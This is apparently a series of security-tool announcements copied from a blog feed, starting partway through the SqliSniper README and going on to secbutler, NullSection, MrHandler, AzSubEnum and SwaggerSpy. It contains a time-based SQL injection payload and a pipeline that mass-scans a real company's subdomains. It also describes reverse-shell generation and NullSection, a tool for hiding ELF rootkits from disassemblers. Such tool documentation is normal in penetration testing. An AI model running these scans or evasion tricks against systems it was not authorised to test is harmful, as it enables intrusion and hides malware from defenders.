--single-payload SINGLE_PAYLOAD
Single payload for testing
--discord DISCORD Discord Webhook URL
--headers HEADERS File containing headers (default is headers.txt)
--threads THREADS Number of threads

Running SqliSniper

Single Url Scan

The url can be provided with -u flag for single site scan

./sqlisniper.py -u http://example.com

File Input

The -r flag allows SqliSniper to read a file containing multiple URLs for simultaneous scanning.

./sqlisniper.py -r url.txt

piping URLs

The SqliSniper can also worked with the pipeline input with -p flag

cat url.txt | ./sqlisniper.py -p

The pipeline feature facilitates seamless integration with other tools. For instance, you can utilize tools like subfinder and httpx, and then pipe their output to SqliSniper for mass scanning.

subfinder -silent -d google.com | sort -u | httpx -silent | ./sqlisniper.py -p

Scanning with custom payloads

By default the SqliSniper use the payloads.txt file. However --payload flag can be used for providing custom payloads file.

./sqlisniper.py -u http://example.com --payload mssql_payloads.txt

While using the custom payloads file, ensure that you substitute the sleep time with %__TIME_OUT__%. SqliSniper dynamically adjusts the sleep time iteratively to mitigate potential false positives. The payloads file should look like this.

ubuntu:~/sqlisniper$ cat payloads.txt 

Scanning with Single Payloads

If you want to only test with the single payload --single-payload flag can be used. Make sure to replace the sleep time with %__TIME_OUT__%

./sqlisniper.py -r url.txt --single-payload "0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z"

Scanning Custom Header

Headers are saved in the file headers.txt for scanning custom header save the custom HTTP Request Header in headers.txt file.

ubuntu:~/sqlisniper$ cat headers.txt 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

Sending Discord Alert Notifications

SqliSniper also offers Discord alert notifications, enhancing its functionality by providing real-time alerts through Discord webhooks. This feature proves invaluable during large-scale scans, allowing prompt notifications upon detection.

./sqlisniper.py -r url.txt --discord <web_hookurl>


Threads can be defined with --threads flag

 ./sqlisniper.py -r url.txt --threads 10

Note: It is crucial to consider that employing a higher number of threads might lead to potential false positives or overlooking valid issues. Due to the nature of time-based SQL injection it is recommended to use lower thread for more accurate detection.

SqliSniper is made inΒ  pythonΒ with lots of <3 by @Muhammad Danial.

Secbutler - The Perfect Butler For Pentesters, Bug-Bounty Hunters And Security Researchers

By: Zion3R
14 February 2024 at 11:30

Essential utilities for pentester, bug-bounty hunters and security researchers

secbutler is a utility tool made for pentesters, bug-bounty hunters and security researchers that contains all the most used and tedious stuff commonly used while performing cybersecurity activities (like installing sec-related tools, retrieving commands for revshells, serving common payloads, obtaining a working proxy, managing wordlists and so forth).

The goal is to obtain a tool that meets the requirements of the community, therefore suggestions and PRs are very welcome!

  • Generate a reverse shell command
  • Obtain proxy
  • Download & deploy common payloads
  • Obtain reverse shell listener command
  • Generate bash install script for common tools
  • Generate bash download script for Wordlists
  • Read common cheatsheets and payloads

secbutler -h

This will display the help for the tool

                   __          __  __
________ _____/ /_ __ __/ /_/ /__ _____
/ ___/ _ \/ ___/ __ \/ / / / __/ / _ \/ ___/
(__ ) __/ /__/ /_/ / /_/ / /_/ / __/ /

v0.1.9 - https://github.com/groundsec/secbutler

Essential utilities for pentester, bug-bounty hunters and security researchers

secbutler [flags]
secbutler [command]

Available Commands:
cheatsheet Read common cheatsheets & payloads
help Help about any command
listener Obtain the command to start a reverse shell listener
payloads Obtain and serve common payloads
proxy Obtain a random proxy from FreeProxy
revshell Obtain the command for a reverse shell
tools Generate a install script for the most common cybersecurity tools
version Print the current version
wordlists Generate a download script for the most common wordlists

-h, --help help for secbutler

Use "secbutler [command] --help" for more information about a command.


Run the following command to install the latest version:

go install github.com/groundsec/secbutler@latest

Or you can simply grab an executable from the Releases page.


secbutler is made with πŸ–€ by the GroundSec team and released under the MIT LICENSE.

WEB-Wordlist-Generator - Creates Related Wordlists After Scanning Your Web Applications

By: Zion3R
15 February 2024 at 11:30

WEB-Wordlist-Generator scans your web applications and creates related wordlists to take preliminary countermeasures against cyber attacks.

  • [x] Scan Static Files.
  • [ ] Scan Metadata Of Public Documents (pdf,doc,xls,ppt,docx,pptx,xlsx etc.)
  • [ ] Create a New Associated Wordlist with the Wordlist Given as a Parameter.


From Git
git clone https://github.com/OsmanKandemir/web-wordlist-generator.git
cd web-wordlist-generator && pip3 install -r requirements.txt
python3 generator.py -d target-web.com

From Dockerfile

You can run this application on a container after build a Dockerfile.

docker build -t webwordlistgenerator .
docker run webwordlistgenerator -d target-web.com -o

From DockerHub

You can run this application on a container after pulling from DockerHub.

docker pull osmankandemir/webwordlistgenerator:v1.0
docker run osmankandemir/webwordlistgenerator:v1.0 -d target-web.com -o

-d DOMAINS [DOMAINS], --domains DOMAINS [DOMAINS] Input Multi or Single Targets. --domains target-web1.com target-web2.com
-p PROXY, --proxy PROXY Use HTTP proxy. --proxy
-a AGENT, --agent AGENT Use agent. --agent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
-o PRINT, --print PRINT Use Print outputs on terminal screen.

NullSection - An Anti-Reversing Tool That Applies A Technique That Overwrites The Section Header With Nullbytes

By: Zion3R
16 February 2024 at 11:30

NullSection is an Anti-Reversing tool that applies a technique that overwrites the section header with nullbytes.

git clone https://github.com/MatheuZSecurity/NullSection
cd NullSection
gcc nullsection.c -o nullsection


When running nullsection on any ELF, it could be .ko rootkit, after that if you use Ghidra/IDA to parse ELF functions, nothing will appear no function to parse in the decompiler for example, even if you run readelf -S / path /to/ elf the following message will appear "There are no sections in this file."

Make good use of the tool!

We are not responsible for any damage caused by this tool, use the tool intelligently and for educational purposes only.

MrHandler - Linux Incident Response Reporting

By: Zion3R
17 February 2024 at 23:30


MR.Handler is a specialized tool designed for responding to security incidents on Linux systems. It connects to target systems via SSH to execute a range of diagnostic commands, gathering crucial information such as network configurations, system logs, user accounts, and running processes. At the end of its operation, the tool compiles all the gathered data into a comprehensive HTML report. This report details both the specifics of the incident response process and the current state of the system, enabling security analysts to more effectively assess and respond to incidents.

π—œπ—‘π—¦π—§π—”π—Ÿπ—Ÿπ—”π—§π—œπ—’π—‘ π—œπ—‘π—¦π—§π—₯π—¨π—–π—§π—œπ—’π—‘π—¦
  $ pip3 install colorama
$ pip3 install paramiko
$ git clone https://github.com/emrekybs/BlueFish.git
$ cd MrHandler
$ chmod +x MrHandler.py
$ python3 MrHandler.py


AzSubEnum - Azure Service Subdomain Enumeration

By: Zion3R
18 February 2024 at 11:30

AzSubEnum is a specialized subdomain enumeration tool tailored for Azure services. This tool is designed to meticulously search and identify subdomains associated with various Azure services. Through a combination of techniques and queries, AzSubEnum delves into the Azure domain structure, systematically probing and collecting subdomains related to a diverse range of Azure services.

How it works?

AzSubEnum operates by leveraging DNS resolution techniques and systematic permutation methods to unveil subdomains associated with Azure services such as Azure App Services, Storage Accounts, Azure Databases (including MSSQL, Cosmos DB, and Redis), Key Vaults, CDN, Email, SharePoint, Azure Container Registry, and more. Its functionality extends to comprehensively scanning different Azure service domains to identify associated subdomains.

With this tool, users can conduct thorough subdomain enumeration within Azure environments, aiding security professionals, researchers, and administrators in gaining insights into the expansive landscape of Azure services and their corresponding subdomains.

Why i create this?

During my learning journey on Azure AD exploitation, I discovered that the Azure subdomain tool, Invoke-EnumerateAzureSubDomains from NetSPI, was unable to run on my Debian PowerShell. Consequently, I created a crude implementation of that tool in Python.

➜  AzSubEnum git:(main) βœ— python3 azsubenum.py --help
usage: azsubenum.py [-h] -b BASE [-v] [-t THREADS] [-p PERMUTATIONS]

Azure Subdomain Enumeration

-h, --help show this help message and exit
-b BASE, --base BASE Base name to use
-v, --verbose Show verbose output
-t THREADS, --threads THREADS
Number of threads for concurrent execution
File containing permutations

Basic enumeration:

python3 azsubenum.py -b retailcorp --thread 10

Using permutation wordlists:

python3 azsubenum.py -b retailcorp --thread 10 --permutation permutations.txt

With verbose output:

python3 azsubenum.py -b retailcorp --thread 10 --permutation permutations.txt --verbose

SwaggerSpy - Automated OSINT On SwaggerHub

By: Zion3R
19 February 2024 at 11:30

SwaggerSpy is a tool designed for automated Open Source Intelligence (OSINT) on SwaggerHub. This project aims to streamline the process of gathering intelligence from APIs documented on SwaggerHub, providing valuable insights for security researchers, developers, and IT professionals.

What is Swagger?

Swagger is an open-source framework that allows developers to design, build, document, and consume RESTful web services. It simplifies API development by providing a standard way to describe REST APIs using a JSON or YAML format. Swagger enables developers to create interactive documentation for their APIs, making it easier for both developers and non-developers to understand and use the API.

About SwaggerHub

SwaggerHub is a collaborative platform for designing, building, and managing APIs using the Swagger framework. It offers a centralized repository for API documentation, version control, and collaboration among team members. SwaggerHub simplifies the API development lifecycle by providing a unified platform for API design and testing.

Why OSINT on SwaggerHub?

Performing OSINT on SwaggerHub is crucial because developers, in their pursuit of efficient API documentation and sharing, may inadvertently expose sensitive information. Here are key reasons why OSINT on SwaggerHub is valuable:

  1. Developer Oversights: Developers might unintentionally include secrets, credentials, or sensitive information in API documentation on SwaggerHub. These oversights can lead to security vulnerabilities and unauthorized access if not identified and addressed promptly.

  2. Security Best Practices: OSINT on SwaggerHub helps enforce security best practices. Identifying and rectifying potential security issues early in the development lifecycle is essential to ensure the confidentiality and integrity of APIs.

  3. Preventing Data Leaks: By systematically scanning SwaggerHub for sensitive information, organizations can proactively prevent data leaks. This is especially crucial in today's interconnected digital landscape where APIs play a vital role in data exchange between services.

  4. Risk Mitigation: Understanding that developers might forget to remove or obfuscate sensitive details in API documentation underscores the importance of continuous OSINT on SwaggerHub. This proactive approach mitigates the risk of unintentional exposure of critical information.

  5. Compliance and Privacy: Many industries have stringent compliance requirements regarding the protection of sensitive data. OSINT on SwaggerHub ensures that APIs adhere to these regulations, promoting a culture of compliance and safeguarding user privacy.

  6. Educational Opportunities: Identifying oversights in SwaggerHub documentation provides educational opportunities for developers. It encourages a security-conscious mindset, fostering a culture of awareness and responsible information handling.

By recognizing that developers can inadvertently expose secrets, OSINT on SwaggerHub becomes an integral part of the overall security strategy, safeguarding against potential threats and promoting a secure API ecosystem.

How SwaggerSpy Works

SwaggerSpy obtains information from SwaggerHub and utilizes regular expressions to inspect API documentation for sensitive information, such as secrets and credentials.

Getting Started

To use SwaggerSpy, follow these steps:

  1. Installation: Clone the SwaggerSpy repository and install the required dependencies.
git clone https://github.com/UndeadSec/SwaggerSpy.git
cd SwaggerSpy
pip install -r requirements.txt
  1. Usage: Run SwaggerSpy with the target search terms (more accurate with domains).
python swaggerspy.py searchterm
  1. Results: SwaggerSpy will generate a report containing OSINT findings, including information about the API, endpoints, and secrets.


SwaggerSpy is intended for educational and research purposes only. Users are responsible for ensuring that their use of this tool complies with applicable laws and regulations.


Contributions to SwaggerSpy are welcome! Feel free to submit issues, feature requests, or pull requests to help improve this tool.

About the Author

SwaggerSpy is developed and maintained by Alisson Moretto (UndeadSec)

I'm a passionate cyber threat intelligence pro who loves sharing insights and crafting cybersecurity tools.


Regular Expressions Enhancement
  • [ ] Review and improve existing regular expressions.
  • [ ] Ensure that regular expressions adhere to best practices.
  • [ ] Check for any potential optimizations in the regex patterns.
  • [ ] Test regular expressions with various input scenarios for accuracy.
  • [ ] Document any complex or non-trivial regex patterns for better understanding.
  • [ ] Explore opportunities to modularize or break down complex patterns.
  • [ ] Verify the regular expressions against the latest specifications or requirements.
  • [ ] Update documentation to reflect any changes made to the regular expressions.


SwaggerSpy is licensed under the MIT License. See the LICENSE file for details.


Special thanks to @Liodeus for providing project inspiration through swaggerHole.
